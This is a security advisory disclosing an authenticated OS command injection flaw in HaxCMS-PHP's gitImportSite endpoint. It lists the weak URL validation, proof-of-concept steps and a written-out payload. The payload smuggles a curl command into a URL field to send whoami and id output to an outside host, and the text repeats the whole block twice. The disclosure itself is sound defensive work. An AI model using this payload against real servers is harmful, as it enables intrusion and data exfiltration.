Headline
GHSA-g4cf-pp4x-hqgw: HaxCMS-PHP Command Injection Vulnerability
Summary
The ‘gitImportSite’ functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.
Details
The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and ‘strpos’ functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
Affected Resources
• Operations.php:2103 gitImportSite() • <domain>/<user>/system/api/gitImportSite
PoC
To replicate this vulnerability, authenticate and send a POST request to the ‘gitImportSite’ endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as ‘archiveSite’).
Start a webserver.
Initiate a request to the ’archiveSite’ endpoint.
Capture and modify the request in BurpSuite.
- Observe command output in the HTTP request from the server.
Command Injection Payload
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
Impact
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
Summary
The ‘gitImportSite’ functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.
Details
The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and ‘strpos’ functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
Affected Resources
• Operations.php:2103 gitImportSite()
• <domain>/<user>/system/api/gitImportSite
PoC
To replicate this vulnerability, authenticate and send a POST request to the ‘gitImportSite’ endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as ‘archiveSite’).
Start a webserver.
Initiate a request to the ’archiveSite’ endpoint.
Capture and modify the request in BurpSuite.
Observe command output in the HTTP request from the server.
Command Injection Payload
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
Impact
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
References
- GHSA-g4cf-pp4x-hqgw
- haxtheweb/haxcms-nodejs@5131fea
- https://nvd.nist.gov/vuln/detail/CVE-2025-49141